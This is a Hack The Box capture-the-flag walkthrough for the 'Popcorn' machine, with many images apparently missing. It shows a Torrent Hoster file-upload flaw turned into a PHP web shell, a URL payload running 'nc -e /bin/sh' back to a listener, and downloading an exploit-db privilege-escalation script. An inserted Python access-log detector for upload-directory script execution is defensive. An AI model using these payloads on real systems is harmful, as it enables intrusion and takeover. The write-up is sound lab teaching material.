Hack The Box: Popcorn




Difficulty: Medium
Machine Creator: ch4p
Tools Used: NMAP, Gobuster, Searchsploit, PHP, Burp Suite, Python

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC 10.10.10.6

HTTP


Gobuster

Having verified that there is a web server, we can start by scanning the website for directories.

gobuster -u http://10.10.10.6 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40

HTTP


Searchsploit


A searchsploit search shows that the Torrent Hoster webpage is vulnerable to uploads.

Torrent Hoster









Here I’ve uploaded a new logo for our Kali torrent.




Burp Suite

I’m starting Burp Suite and repeating the same process of uploading the screenshot while using Burp as a proxy.




echo "<Base64 Hash>" | base64 -d > file

Exploit upload

Now we can start uploading an exploit to this server.







Reverse Shell

We need to set up our local netcat listener:

nc -lvnp 1234

In the URL, we can execute netcat on the remote server by replacing the whoami with the netcat command:

http://10.10.10.6/torrent/upload/1a17df934566f21b12489987f070671223b23a9d.php?exploit=nc%20-e%20/bin/sh%2010.10.14.11%201234


python -c 'import pty; pty.spawn("/bin/sh")'
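
Detection side of the steps above, as an added example that is not part of the original write-up: a script request served out of the upload directory, with a command in its query string, is visible in the web server's access log. The sketch assumes Apache common/combined log format and an upload path containing /upload/; the function name, patterns and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Assumption: uploaded files are served from a path containing /upload/ or /uploads/.
UPLOAD_DIR = re.compile(r"/uploads?/", re.I)
# Extensions commonly handed to the PHP interpreter, including "name.php.png" style names.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)
# Tokens suggesting that a query string carries a shell command.
SHELL_HINT = re.compile(
    r"(^|[=\s;|&])(nc|ncat|bash|sh|wget|curl|whoami|id|python\d?)(\s|$)|/bin/", re.I)
# ip ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

SAMPLE_LOG = [  # constructed log lines, not captured from any real host
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /torrent/upload/example.png HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /torrent/upload/example.php HTTP/1.1" 200 12 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:00:15 +0000] "GET /torrent/upload/example.php?exploit=whoami HTTP/1.1" 200 9 "-" "-"',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /torrent/index.php?id=5 HTTP/1.1" 200 800 "-" "-"',
]

def find_upload_execution(lines):
    """Return (ip, path, status, severity) for script requests under an upload directory."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip malformed lines rather than guess at their fields
        ip, _method, target, status = m.groups()
        parts = urlsplit(target)
        path = unquote(parts.path)  # decode %2e-style tricks before matching
        if not (UPLOAD_DIR.search(path) and SCRIPT_EXT.search(path)):
            continue  # images and application pages outside the upload dir are ignored
        query = unquote_plus(parts.query)
        # Any script served from an upload dir is suspicious; a command-like
        # query string on top of that raises the severity.
        severity = "high" if SHELL_HINT.search(query) else "medium"
        findings.append((ip, path, int(status), severity))
    return findings

if __name__ == "__main__":
    for finding in find_upload_execution(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged line means the server executed or served the script, which is the case worth triaging first.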

User.txt


Privilege Escalation

ls -a



wget http://www.exploit-db.com/download/14339.sh

Exploitation Error


Python PTY Shells

https://github.com/infodox/python-pty-shells

git clone https://github.com/infodox/python-pty-shells.git








SSH


Root.txt


#FileUploadVulnerability #RemoteCodeExecution